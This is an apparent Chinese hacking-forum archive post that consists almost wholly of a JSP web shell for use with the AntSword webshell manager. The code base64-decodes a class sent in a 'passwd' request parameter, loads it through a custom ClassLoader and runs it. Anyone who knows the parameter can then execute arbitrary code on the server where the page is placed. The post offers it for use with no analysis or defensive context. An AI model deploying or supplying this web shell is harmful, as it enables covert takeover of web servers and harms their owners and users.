antsword jsp 一句话链接-女黑客 - Powered by Discuz! Archiver

nvhack 发表于 2023-1-11 12:26:46

antsword jsp 一句话链接

<%!
    class U extends ClassLoader {
      U(ClassLoader c) {
            super(c);
      }
      public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
      }
    }

    public byte[] base64Decode(String str) throws Exception {
      try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
      } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
      }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
      new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

页: [1]
查看完整版本: antsword jsp 一句话链接